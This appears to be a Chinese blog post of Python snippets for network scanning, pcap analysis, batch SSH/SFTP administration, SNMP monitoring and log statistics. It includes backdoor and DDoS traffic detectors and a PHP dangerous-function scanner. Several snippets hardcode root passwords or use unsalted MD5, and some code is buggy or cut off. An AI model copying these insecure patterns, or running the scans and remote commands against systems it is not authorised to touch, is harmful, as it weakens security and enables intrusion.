作者編寫的一些代碼片段,本版本為殘廢刪減版,沒有加入多線程,也沒有實現任何有價值的功能,只是一個臨時記事本,記錄下本人編寫代碼的一些思路,有價值的完整版就不發出來了,自己組織吧,代碼沒啥技術含量,畢竟Python這一塊沒怎么認真研究過,代碼也都是隨性瞎寫的,大佬不要噴我,將就着看吧。
廢話不啰嗦,開始上代碼,第一種是無參數的簡單實現方式.
import sys
if len(sys.argv) < 2:
print ("沒有輸入任何參數")
sys.exit()
if sys.argv[1].startswith("-"):
option = sys.argv[1][1:]
if option == "version":
print ("版本信息")
elif option == "help":
print ("幫助菜單")
else:
print ("異常")
sys.exit()
我們還可以編寫一個交互式的Shell環境,這樣能更加靈活的操作命令,操作方式 [shell] # ls
# coding:utf-8
import os
def add(x, y):
print("兩數相連",x + y)
def clear():
os.system("cls")
def main():
while True:
try:
cmd = str(input("[Shell] # ")).split()
cmd_len = len(cmd)
if (cmd == ""):
continue
elif (cmd[0] == "exit"):
exit(1)
elif (cmd[0] == "clear"):
clear()
elif (cmd[0] == "add"):
if(cmd_len-1 >= 2):
temp1 = cmd[1]
temp2 = cmd[2]
add(temp1,temp2)
else:
print("add 參數不正確,至少傳遞2個參數")
else:
print("沒有找到這個命令")
except Exception:
continue
if __name__ == '__main__':
main()
也可以使用內置庫實現交互命令,do_xxxx()
import os
import sys
from cmd import Cmd
class BingCmd(Cmd):
prompt = "[Shell] #"
def preloop(self):
print("hello world")
def do_bing(self, argv):
print("參數傳遞: {}".format(argv))
prompt = "bing >"
def help_bing(self):
print("bing 函數的幫助信息")
def emptyline(self):
print("當輸入空行時調用該方法")
def default(self,line):
print("無法識別輸入的command時調用該方法")
def do_exit(self):
sys.exit()
if __name__ == "__main__":
BingCmd().cmdloop()
如果需要編寫一些相對大型的項目,則需要使用類來開發,以下代碼用類實現的命令行傳遞.
'''http://patorjk.com/software/taag'''
#coding:utf-8
import optparse
class MyClass:
def __init__(self):
usage = ''' 123'''
parser = optparse.OptionParser(usage=usage)
parser.add_option("-s", "--server", type="string" , dest="server", help="you server IP")
parser.add_option("-p", "--port", type="int", dest="port", help="you server port")
self.options, self.args = parser.parse_args()
parser.print_help()
def check(self):
if not self.options.server or not self.options.port:
exit()
def fuck(self,ip,port):
try:
print("接收到參數列表,准備執行功能!")
for i in range(0,100):
print(ip,port)
except:
print("[ - ] Not Generate !")
if __name__ == '__main__':
opt = MyClass()
opt.check()
ip = opt.options.server
port = opt.options.port
if ip != "None" and port != "None":
opt.fuck(ip,port)

構造一個數據包
from scapy.all import Ether
from scapy.all import ARP
from scapy.all import srp
ether = Ether(src="00:00:00:00:00:00",dst="FF:FF:FF:FF:FF:FF")
arp = ARP(op=1,hwsrc="00:00:00:00:00:00",hwdst="FF:FF:FF:FF:FF:FF",psrc="192.168.1.2",pdst="255.255.255.255")
send = ether/arp
res = srp(send,timeout=3,verbose=0)
nmap 提取關鍵數據
import numpy as np
from pylab import *
import nmap
n=nmap.PortScanner()
ret = n.scan(hosts="192.168.1.0/24",arguments="-O")
#print(n["192.168.1.20"]['addresses']['ipv4'])
print(ret)
ret["nmap"]["command_line"]
"nmap -O 192.168.1.20"
>>> ret["nmap"]["scanstats"]["timestr"]
'Thu Mar 19 19:20:08 2020'
>>> ret["nmap"]["scanstats"]["uphosts"]
'4'
>>> ret["nmap"]["scanstats"]["totalhosts"]
'256'
>>> n.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.20"]["addresses"]
{'ipv4': '192.168.1.20', 'mac': '00:50:56:22:6F:D3'}
>>> ret["scan"]["192.168.1.20"]["addresses"]["ipv4"]
'192.168.1.20'
>>> ret["scan"]["192.168.1.20"]["addresses"]["mac"]
'00:50:56:22:6F:D3'
>>> ret["scan"]["192.168.1.20"]["tcp"].keys()
dict_keys([21, 22, 80, 139, 445, 3306])
>>> ret["scan"]["192.168.1.20"]["osmatch"][0]["name"]
'Linux 3.2 - 4.9'
>>> ret["scan"]["192.168.1.10"]["vendor"].values()[0]
'Elitegroup Computer System CO.'
def aaa():
mpl.rcParams['font.sans-serif'] = ['KaiTi']
label = "windows xp","windows 7","Windows 8","Linux 4","Centos 6","Huawei交換機"
fracs = [1,2,3,4,5,1]
plt.axes(aspect=1)
plt.pie(x=fracs,labels=label,autopct="%0d%%")
plt.show()
nmap 搞事情,統計結果
import os,sys
number = [80,8080,3306,3389,1433,1433,1433]
flag = {}
list_num = set(number)
for item in list_num:
num = str(number.count(item))
flag[item]=num
print(flag)
--------------------------------------------------------------------------
>>> Nmap.all_hosts()
['192.168.1.1', '192.168.1.10', '192.168.1.2', '192.168.1.20']
>>> ret["scan"]["192.168.1.1"]["tcp"].keys()
dict_keys([80, 1900])
>>> for item in Nmap.all_hosts():
... ret["scan"][item]["tcp"].keys()
...
dict_keys([80, 1900])
dict_keys([100, 135, 139, 443, 902, 912, 1433, 2869, 3389])
dict_keys([135, 139, 445, 5357])
a = dict_keys([21, 22, 80, 139, 445, 3306])
list(a)
--------------------------------------------------------------------------
import os
import nmap
def ScanPort():
port =[]
flag = {}
dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0}
Nmap = nmap.PortScanner()
ret = Nmap.scan(hosts="192.168.1.0/24",arguments="-PS")
for item in Nmap.all_hosts():
temp = list(ret["scan"][item]["tcp"].keys())
port.extend(temp)
list_num = set(port)
for item in list_num:
num = int(port.count(item))
flag[item] = num
dic["WebServer"] = flag.get(80)
dic["MySQL"] = flag.get(3306)
dic["SSH"] = flag.get(22)
dic["MSSQL"] = flag.get(1433)
print(dic)
ScanPort()
C:\Users\LyShark\Desktop>python main.py
{55555, 3, 902, 135, 139, 9102, 912, 21, 22, 1433, 1062, 425, 2601, 14000, 55600, 2869, 443, 3389, 445, 3905, 1352, 8654, 80, 82, 212, 100, 616, 3306, 1900, 5357}
{'WebServer': 3, 'MySQL': 1, 'SSH': 1, 'MSSQL': 0}
nmap 看圖識字,頻繁掃描會出現崩潰的情況,解決辦法是異常處理。
import os,nmap
import numpy as np
from matplotlib.pylab import *
# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple
def ScanPort():
port =[]
flag = {}
dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0}
Nmap = nmap.PortScanner()
ret = Nmap.scan(hosts="192.168.1.0/24",arguments="-PS")
for item in Nmap.all_hosts():
temp = list(ret["scan"][item]["tcp"].keys())
port.extend(temp)
list_num = set(port)
for item in list_num:
num = int(port.count(item))
flag[item] = num
dic["WebServer"] = flag.get(80)
dic["MySQL"] = flag.get(3306)
dic["SSH"] = flag.get(22)
dic["MSSQL"] = flag.get(1433)
print(dic)
mpl.rcParams['font.sans-serif'] = ['KaiTi']
label = list(dic.keys())
fracs = list(dic.values())
plt.axes(aspect=1)
plt.pie(x=fracs,labels=label,autopct="%0d%%")
plt.savefig('port.png')
ScanPort()


dpkt 流量解包: 流量解包
import dpkt
import socket
import geoip2.database
import argparse
p=dpkt.ethernet.Ethernet(data)
if p.data.__class__.__name__=="IP":
if p.data.data.__class__.__name__=="TCP":
if p.data.data.dport== 80 and data.data.dport == 443:
data=p.data.data.data
if b'www.com' in data:
recv=re.findall(b'[1-9][0-9]{4,}',data)
if len(recv):
print('{}'.format(bytes.decode(recv[0]).replace('o_cookie=','')))
def GetPcap(pcap):
ret = []
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
# print("[+] 源地址: %-16s --> 目標地址: %-16s"%(src,dst))
ret.append(dst)
except:
pass
return set(ret)

公開一個定位工具 這里只公開一個基礎班的地址查詢工具,完整版不變公開。
import dpkt
import socket
import geoip2.database
import argparse
def GetPcap(pcap):
ret = []
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
# print("[+] 源地址: %-16s --> 目標地址: %-16s"%(src,dst))
ret.append(dst)
except:
pass
return set(ret)
def retKML(addr,longitude,latitude):
kml = (
'<Placemark>\n'
'<name>%s</name>\n'
'<Point>\n'
'<coordinates>%6f,%6f</coordinates>\n'
'</Point>\n'
'</Placemark>\n'
) %(addr, longitude, latitude)
return kml
if __name__ == '__main__':
# 使用方式: main.py -p data.pcap -d GeoLite2-City.mmdb (分析數據包中IP)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--pcap", dest="pcap_file", help="set -p *.pcap")
parser.add_argument("-d", "--mmdb", dest="mmdb_file", help="set -d *.mmdb")
args = parser.parse_args()
if args.pcap_file and args.mmdb_file:
fp = open(args.pcap_file,'rb')
pcap = dpkt.pcap.Reader(fp)
addr = GetPcap(pcap)
reader = geoip2.database.Reader(args.mmdb_file)
kmlheader = '<?xml version="1.0" encoding="UTF-8"?>\
\n<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n'
with open("GoogleEarth.kml", "w") as f:
f.write(kmlheader)
f.close()
for item in addr:
try:
response = reader.city(item)
print("IP地址: %-16s --> " %item,end="")
print("網段: %-16s --> " %response.traits.network,end="")
print("地區: {}".format(response.country.names["zh-CN"]),end="\n")
with open("GoogleEarth.kml","a+") as f:
f.write(retKML(item,response.location.latitude, response.location.longitude))
f.close()
except Exception:
pass
kmlfooter = '</Document>\n</kml>\n'
with open("GoogleEarth.kml", "a+") as f:
f.write(kmlfooter)
f.close()
else:
parser.print_help()

默認會生成谷歌文本,你可以將其倒入谷歌地球

檢測URL中的敏感路徑 FindPcapWord可用於檢測URL中是否存在敏感字
def FindPcapWord(pcap,WordKey):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
http = dpkt.http.Request(tcp.data)
if(http.method == "GET"):
uri = http.uri.lower()
if WordKey in uri:
print("[+] 源地址: {} --> 目標地址: {} 檢索到URL中存在 {}".format(src,dst,uri))
except Exception:
pass
FindHivemind 檢測數據包中是否存在敏感字符
def FindHivemind(pcap):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
tcp = ip.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
sport = tcp.sport
dport = tcp.dport
# print("[+] 源地址: {}:{} --> 目標地址:{}:{}".format(src,sport,dst,dport))
if dport == 80 and dst == "125.39.247.226":
# 如果數據流中存在cmd等明文命令則說明可能存在后門
if '[cmd]# ' in tcp.data.lower():
print("[+] {}:{}".format(dst,dport))
except Exception:
pass
dpkt 檢測網絡流量合法性: 通常配合WireShark抓取網絡數據包,然后配合dpkt解包工具對流量進行分析,常用於網絡取證.
# FindPcapWord可用於檢測URL中是否存在敏感字
def FindPcapWord(pcap,WordKey):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
http = dpkt.http.Request(tcp.data)
if(http.method == "GET"):
uri = http.uri.lower()
if WordKey in uri:
print("[+] 源地址: {} --> 目標地址: {} 檢索到URL中存在 {}".format(src,dst,uri))
except Exception:
pass
# FindHivemind 檢測數據包中是否存在敏感字符
def FindHivemind(pcap):
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
tcp = ip.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
sport = tcp.sport
dport = tcp.dport
# print("[+] 源地址: {}:{} --> 目標地址:{}:{}".format(src,sport,dst,dport))
if dport == 80 and dst == "125.39.247.226":
# 如果數據流中存在cmd等明文命令則說明可能存在后門
if '[cmd]# ' in tcp.data.lower():
print("[+] {}:{}".format(dst,dport))
except Exception:
pass
# 檢測主機是否被DDOS攻擊了.
def FindDDosAttack(pcap):
pktCount = {}
for timestamp,packet in pcap:
try:
eth = dpkt.ethernet.Ethernet(packet)
ip = eth.data
tcp = ip.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
sport = tcp.sport
# 累計判斷各個src地址對目標地址80端口訪問次數
if dport == 80:
stream = src + ":" + dst
if pktCount.has_key(stream):
pktCount[stream] = pktCount[stream] + 1
else:
pktCount[stream] = 1
except Exception:
pass
for stream in pktCount:
pktSent = pktCount[stream]
# 如果超過設置的檢測閾值500,則判斷為DDOS攻擊行為
if pktSent > 500:
src = stream.split(":")[0]
dst = stream.split(":")[1]
print("[+] 源地址: {} 攻擊: {} 流量: {} pkts.".format(src,dst,str(pktSent)))
if __name__ == "__main__":
fp = open("D://data.pcap","rb")
pcap = dpkt.pcap.Reader(fp)
FindPcapWord(pcap,"wang.zip")
簡單實現批量執行SSH命令:
import os,paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def BatchCMD(address,username,password,port,command):
try:
ssh.connect(hostname=address,username=username,password=password,port=port,timeout=2)
stdin , stdout , stderr = ssh.exec_command(command)
result = stdout.read()
if len(result) != 0:
print('\033[0mIP: {} UserName:{} Port: {} Status: OK'.format(address,username,port))
return 1
else:
print('\033[45mIP: {} UserName:{} Port: {} Status: Error'.format(address,username,port))
return 0
except Exception:
print('\033[45mIP: {} UserName:{} Port: {} Status: Error'.format(address, username, port))
return 0
if __name__ == "__main__":
fp = open("ip.log","r+")
for temp in fp.readlines():
ip = temp.split("\n")[0]
BatchCMD(ip, "root", "1233", "22", "ls && echo $?")
簡單實現批量SFTP遠程傳輸:
import paramiko
def BatchSFTP(address,username,password,port,soruce,target,flag):
transport = paramiko.Transport((address, int(port)))
transport.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(transport)
if flag == "PUT":
try:
ret = sftp.put(soruce, target)
if ret !="":
print("Addr:{} UserName:{} Source:{} Target:{} Success".format(address,username,soruce,target))
return 1
else:
print("Addr:{} UserName:{} Source:{} Target:{} Error".format(address, username, soruce, target))
return 0
transport.close()
except Exception:
return 0
transport.close()
elif flag == "GET":
try:
target = str(target + "_" + address)
ret = sftp.get(soruce, target)
if ret != "":
print("Addr:{} UserName:{} Source:{} Target:{} Success".format(address, username, soruce, target))
return 1
else:
print("Addr:{} UserName:{} Source:{} Target:{} Error".format(address, username, soruce, target))
return 0
transport.close()
except Exception:
return 0
if __name__ == "__main__":
# 將本地文件./main.py上傳到/tmp/main.py
BatchSFTP("192.168.1.20","root","1233","22","./main.py","/tmp/main.py","PUT")
# 將目標主機下的/tmp/main.py拷貝到本地文件./get/test.py
BatchSFTP("192.168.1.20","root","1233","22","/tmp/main.py","./get/test.py","GET")
通過SSH模塊獲取系統內存數據 這里我寫了一個簡單的獲取內存數據的腳本,當然獲取CPU磁盤等,同樣可以這樣來搞.
import os,paramiko,re
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def SSH_Get_Mem():
dict ={}
list = []
head =["MemTotal","MemFree","Cached","SwapTotal","SwapFree"]
ssh.connect(hostname="192.168.1.20", username="root", password="1233", port=22, timeout=2)
stdin, stdout, stderr = ssh.exec_command('cat /proc/meminfo')
string = str(stdout.read())
for i in [0,1,4,14,15]: # 取出列表中的這幾行
Total = string.split("\\n")[i].split(":")[1].replace(" kB","").strip()
list.append(Total)
for (head,list) in zip(head,list):
dict[head]=int(list); # 組合成一個字典
return dict
if __name__ == "__main__":
for i in range(10):
dic = SSH_Get_Mem()
print(dic)
fabric的使用技巧 fabric工具也是自動化運維利器,其默認依賴於paramiko的二次封裝.
# 簡單實現命令執行
from fabric import Connection
conn = Connection(host="192.168.1.10",user="root",port="22",connect_kwargs={"password":"123"})
try:
with conn.cd("/var/www/html/"):
ret = conn.run("ls -lh",hide=True)
print("主機:" + conn.host + "端口:" + conn.port + "完成")
except Exception:
print("主機:" + conn.host + "端口:" + conn.port + "失敗")
# 讀取數據到本地
from fabric import Connection
conn = Connection(host="192.168.1.20",user="root",port="22",connect_kwargs={"password":"123"})
uname = conn.run('uname -s', hide=True)
if 'Linux' in uname.stdout:
command = "df -h / | tail -n1 | awk '{print $5}'"
print(conn.run(command,hide=True).stdout.strip())
# 文件上傳與下載
from fabric import Connection
conn = Connection(host="192.168.1.20",user="root",port="22",connect_kwargs={"password":"123"})
conn.put("D://zabbix_get.exe","/tmp/zabbix.exe") # 文件上傳
conn.get("/tmp/zabbix.exe","./zab.exe") # 下載文件
通過SNMP收集主機CPU利用率 通過SNMP協議,收集目標主機的CPU利用率(百分比),並返回JSON字符串.
import os,re,time
def Get_CPU_Info(addr):
try:
Head = ["HostName","CoreLoad","CpuUser","CpuSystem","CpuIdle"]
CPU = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
CPU.append(ret.read().split(":")[3].strip())
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.25.3.3.1.2")
CPU.append(ret.read().split(":")[3].strip())
for i in [9,10,11]:
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " 1.3.6.1.4.1.2021.11.{}.0".format(i))
ret = ret.read()
Info = ret.split(":")[3].strip()
CPU.append(Info)
return dict(zip(Head,CPU))
except Exception:
return 0
if __name__ == '__main__':
for i in range(100):
dic = Get_CPU_Info("192.168.1.20")
print(dic)
time.sleep(1)
通過SNMP獲取系統CPU負載信息 分別獲取到系統的1,5,15分鍾的負載信息,並返回JSON格式.
import os,re,time
def Get_Load_Info(addr):
try:
Head = ["HostName","Load1","Load5","Load15"]
SysLoad = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
SysLoad.append(ret.read().split(":")[3].strip())
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.10.1.3")
load = list(re.sub(".*STRING: ", "", ret.read()).split("\n"))
SysLoad.append(load[0])
SysLoad.append(load[1])
SysLoad.append(load[2])
return dict(zip(Head,SysLoad))
except Exception:
return 0
if __name__ == '__main__':
dic = Get_Load_Info("192.168.1.20")
print(dic)
通過SNMP獲取系統內存占用
import os,re,time
def Get_Mem_Info(addr):
try:
Head = ["HostName","memTotalSwap","memAvailSwap","memTotalReal","memTotalFree"]
SysMem = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.2.1.1.5")
SysMem.append(ret.read().split(":")[3].strip())
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " .1.3.6.1.4.1.2021.4")
mem = ret.read().split("\n")
for i in [2,3,4,6]:
SysMem.append(re.sub(".*INTEGER: ","",mem[i]).split(" ")[0])
return dict(zip(Head,SysMem))
except Exception:
return 0
if __name__ == '__main__':
dic = Get_Mem_Info("192.168.1.20")
print(dic)
通過SNMP獲取系統磁盤數據 這個案例並不完整,我只寫了一點,后面有個問題一直沒有解決.
import os,re,time
def Get_Disk_Info(addr):
try:
dic = {}
list = []
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageDescr")
DiskName = ret.read().split("\n")
ret =os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageUsed")
DiskUsed = ret.read().split("\n")
ret = os.popen("snmpwalk -v 2c -c nmap " + addr + " HOST-RESOURCES-MIB::hrStorageSize")
DiskSize = ret.read().split("\n")
for i in range(1,len(DiskName) - 7):
dic["Name"]= DiskName[i + 5].split(":")[3]
dic["Used"]= DiskUsed[i + 5].split(":")[3]
dic["Size"]= DiskSize[i + 5].split(":")[3]
list.append(dic)
return list
except Exception:
return 0
if __name__ == '__main__':
list = Get_Disk_Info("192.168.1.20")
print(list)
將指定的日志格式寫入文件
import os,re,time
def WriteFileLog(filename,log):
if os.path.exists(filename):
fp =open(filename,"a+")
fp.write(log+"\n")
else:
fp =open(filename,"w+")
fp.close()
if __name__ == "__main__":
dic = {"admin":"123123"}
WriteFileLog("test.log",str(dic))
計算指定范圍時間戳 通過編程實現計算出指定時間之內對應時間戳數據,用於通過時間戳定位時間區間.
import os
import sys
import time,datetime
# start = 2019-12-10 14:49:00
# end = 2019-12-10 14:50:00
def ReadLog(log,start,ends):
find_list = []
start_time = int(time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S")))
end_time = int(time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S")))
while start_time <= end_time:
find_list.append(start_time)
start_time=start_time+1
print(find_list)
ReadLog("./cpu.log","2019-12-10 14:49:00","2019-12-10 14:50:00")
通過DNSpython模塊查詢域名記錄
# pip install dnspython
import os
import dns.resolver
domain = "baidu.com"
A = dns.resolver.query(domain,"A")
for x in A.response.answer:
for y in x.items:
print("查詢到A記錄:{} ".format(y))
print("*"*50)
MX = dns.resolver.query(domain,"MX")
for x in MX:
print("MX交換數值 {} MX記錄:{} ".format(x.preference,x.exchange))
print("*"*50)
NS = dns.resolver.query(domain,"NS")
for x in NS.response.answer:
for y in x.items:
print("NS名稱服務:{} ".format(y.to_text()))
實現兩個文件Diff差異比對 使用Python內置的模塊就可以完成兩個文件的差異比對,最后生成html報表.
import os
import difflib
def ReadFile(filename):
try:
fp = open(filename,"r")
text = fp.read().splitlines()
fp.close()
return text
except IOError as error:
print("讀取文件出錯了.{}".format(str(error)))
def DiffFile(file1,file2):
text1 = ReadFile(file1)
text2 = ReadFile(file2)
diff = difflib.HtmlDiff()
html = diff.make_file(text1,text2)
fp = open("./diff.html","w")
fp.write(html)
DiffFile("C://old.txt","C://new.txt")
手工實現遍歷目錄下文件 通過手動編程實現對指定目錄中文件的遍歷.
import os
def list_all_files(rootdir):
_files = []
list = os.listdir(rootdir)
for i in range(0,len(list)):
path = os.path.join(rootdir,list[i])
if os.path.isdir(path):
_files.extend(list_all_files(path))
if os.path.isfile(path):
_files.append(path)
return _files
list = list_all_files("D:/sqlite")
print(list)
通過簡單拼接實現遍歷文件 此處也可以使用一個簡單的方法實現遍歷文件與目錄.
import os
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
for name in files:
print(os.path.join(root, name))
for name in dirs:
print(os.path.join(root, name))
import os
for root, dirs, files in os.walk(os.getcwd(), topdown=False):
for name in dirs:
print(os.path.join(root, name))
import os
for root,dirs,files in os.walk(os.getcwd()):
for file in files:
print(os.path.join(root,file))
拼接文件路徑遍歷指定類型的文件
import os
def spider(script_path,script_type):
final_files = []
for root, dirs, files in os.walk(script_path, topdown=False):
for fi in files:
dfile = os.path.join(root, fi)
if dfile.endswith(script_type):
final_files.append(dfile.replace("\\","/"))
print("[+] 共找到了 {} 個PHP文件".format(len(final_files)))
return final_files
PagePath = spider("D://phpstudy/WWW/xhcms","php")
print(PagePath)
簡單實現釘釘報警
import requests
import sys
import json
dingding_url = 'https://oapi.dingtalk.com/robot/send?access_token=6d11af32'
data = {"msgtype": "markdown","markdown": {"title": "監控","text": "apche異常"}}
headers = {'Content-Type':'application/json;charset=UTF-8'}
send_data = json.dumps(data).encode('utf-8')
requests.post(url=dingding_url,data=send_data,headers=headers)
生成隨機驗證碼
import sys
import random
rand=[]
for x in range(6):
y=random.randrange(0,5)
if y == 2 or y == 4:
num=random.randrange(0,9)
rand.append(str(num))
else:
temp=random.randrange(65,91)
c=chr(temp)
rand.append(c)
result="".join(rand)
print(result)
生成XLS報表
import os
import xlwt
import time
def XLSWrite():
workbook = xlwt.Workbook(encoding="utf-8")
sheet =workbook.add_sheet("這里是主標題")
sheet.write(0,0,"編號")
sheet.write(0,1,"內容")
for i in range(0,10):
sheet.write(i+1,0,i)
sheet.write(i+1,1,i)
times = time.time()
workbook.save("{}.xls".format(times))
if os.path.exists("{}.xls".format(times)):
print("保存完成")
if __name__ == "__main__":
XLSWrite()
psutil取系統相關數據
import psutil
cpu = psutil.cpu_times()
print("用戶時間比:{}".format(cpu.user))
print("CPU空閑百分比:{}".format(cpu.idle))
print("CPU邏輯個數:{}".format(psutil.cpu_count()))
print("CPU物理個數:{}".format(psutil.cpu_count(logical=True)))
print("-"*50)
mem = psutil.virtual_memory()
print("系統總內存:{}".format(mem.total))
print("已使用內存:{}".format(mem.used))
print("空閑的內存:{}".format(mem.free))
print("交換內存已使用:{}".format(psutil.swap_memory().used))
print("-"*50)
print("全部分區數據:{}".format(psutil.disk_partitions()))
print("指定掛載點/數據:{}".format(psutil.disk_usage("/")))
print("磁盤總IO數:{}".format(psutil.disk_io_counters()))
print("取單個分區IO個數:{}".format(psutil.disk_io_counters(perdisk=True)))
print("-"*50)
print("獲取網絡IO信息:{}".format(psutil.net_io_counters()))
print("輸出每個網絡接口的IO信息:{}".format(psutil.net_io_counters(pernic=True)))
print("-"*50)
print("系統進程列表:{}".format(psutil.pids()))
process = psutil.Process(0) # 實例化0號進程
print("進程名稱:{}".format(process.name()))
print("進程線程數:{}".format(process.num_threads()))
print("進程工作狀態:{}".format(process.status()))
# print("進程UID:{} GID:{}".format(process.uids,process.gids))
print("取進程利用率:{}".format(process.memory_percent()))
print("進程Socket:{}".format(process.connections()))
實現簡單HTTP服務 對於Web應用,本質上就是socket服務端,用戶的瀏覽器其實就是socket客戶端,其下面就是簡單實現的HTTP服務器.
import socket
def handle_request(client):
buf = client.recv(1024)
client.send(bytes("HTTP/1.1 200 OK\r\n\r\n","UTF-8"))
client.send(bytes("<b>Hello lyshark</b>","UTF-8"))
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("localhost",80))
sock.listen(5)
while True:
connection, address = sock.accept()
handle_request(connection)
connection.close()
if __name__ == "__main__":
main()
簡單實現密碼登錄驗證: 在不使用數據庫的情況下完成密碼驗證,密碼的hash值對應的是123123
import os,time
import hashlib
db = [
{"user":"admin","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
{"user":"guest","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
{"user":"lyshark","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"}
]
def CheckUser(username,password):
hash = hashlib.md5()
for i in range(0,len(db)):
if db[i].get("user") == username:
if db[i].get("Flag") < "5":
hash.update(bytes(password,encoding="utf-8"))
if db[i].get("pass") == str(hash.hexdigest()):
db[i]['Flag'] = 0
return 1
else:
db[i]['Flag'] = str(int(db[i]['Flag']) + 1)
return 0
else:
print("用戶 {} 被永久限制登錄".format(db[i].get("user")))
return 0
return 0
while(True):
username = input("輸入用戶名: ")
password = input("輸入密碼: ")
ret= CheckUser(username,password)
print("登錄狀態:",ret)
針對Web服務的流量統計: 統計Web服務器日志文件中的流量計數,例如192.168.1.10總訪問流量.
import os,sys
def Count_IP_And_Flow(file):
addr = {} # key 保存當前的IP信息
flow = {} # value 保存當前IP流量總和
Count= 0 # 針對IP地址的計數器
with open(file) as f:
contexts = f.readlines()
for line in contexts:
if line.split()[9] != "-" and line.split()[9] != '"-"':
size = line.split()[9]
ip_attr = line.split()[0]
Count = int(size) + Count
if ip_attr in addr.keys():
addr[ip_attr] = addr[ip_attr] + 1
flow[ip_attr] = flow[ip_attr] + int(size)
else:
addr[ip_attr] = 1
flow[ip_attr] = int(size)
return addr,flow
if __name__ == "__main__":
Address,OutFlow = Count_IP_And_Flow("c://access.log")
print("地址計數:{} ---> 流量計數:{}".format(Address,OutFlow))
針對Web服務的狀態碼統計: 統計Web服務日志中的狀態碼的統計,例如404出現的頻率等.
import os,sys
def Count_Flag_And_Flow(file):
list = []
flag = {}
with open(file) as f:
contexts = f.readlines()
for line in contexts:
it = line.split()[8]
list.append(it)
list_num = set(list)
for item in list_num:
num = list.count(item)
print("狀態碼:{} --> 計數:{}".format(item,num))
flag[item] = num
return flag
if __name__ == "__main__":
Address = Count_Flag_And_Flow("c://access.log")
print("地址計數:{} ".format(Address))
計算出指定網段主機IP:
import os
def CalculationIP(Addr_Count):
ret = []
try:
IP_Start = str(Addr_Count.split("-")[0]).split(".")
IP_Heads = str(IP_Start[0] + "." + IP_Start[1] + "." + IP_Start[2] +".")
IP_Start_Range = int(Addr_Count.split(".")[3].split("-")[0])
IP_End_Range = int(Addr_Count.split("-")[1])
for item in range(IP_Start_Range,IP_End_Range+1):
ret.append(IP_Heads+str(item))
return ret
except Exception:
return 0
if __name__ == "__main__":
ret = CalculationIP("192.168.1.10-200")
for item in range(len(ret)):
print("地址范圍內的所有IP: {}".format(ret[item]))
PHP函數掃描工具: 快速掃描PHP文件中的危險函數,可用於挖掘漏洞與一句話掃描.
# coding=gbk
import sys,os,re
def spider(script_path,script_type):
final_files = []
for root, dirs, files in os.walk(script_path, topdown=False):
for fi in files:
dfile = os.path.join(root, fi)
if dfile.endswith(script_type):
final_files.append(dfile.replace("\\","/"))
print("[+] 共找到了 {} 個PHP文件".format(len(final_files)))
return final_files
def scanner(files_list,func):
for item in files_list:
fp = open(item, "r",encoding="utf-8")
data = fp.readlines()
for line in data:
Code_line = data.index(line) + 1
Now_code = line.strip("\n")
#for unsafe in ["system", "insert", "include", "eval","select \*"]:
for unsafe in [func]:
flag = re.findall(unsafe, Now_code)
if len(flag) != 0:
print("函數: {} ---> 函數所在行: {} ---> 路徑: {} " .\
format(flag,Code_line,item))
if __name__ == "__main__":
path = sys.argv[1]
func = sys.argv[2]
ret = spider(path,".php")
scanner(ret,func)
SQL執行語句監控: 通過日志文件,監控MySQL數據庫執行的SQL語句,需要開啟數據庫SET GLOBAL general_log='ON'; set global general_log_file='C:\mysql.log' 這兩個選項才能夠實現監控數據的目的.
import re
try:
fp = open("C:/mysql.log","r")
sql = fp.readlines()
for item in sql:
temp = item.replace("\n","").split('\t')
if re.search("Connect",temp[1]) == None and temp[2] != "":
print("狀態:{} ---> 執行語句: {}".format(temp[1],temp[2]))
open("C:/mysql.log","w")
except Exception:
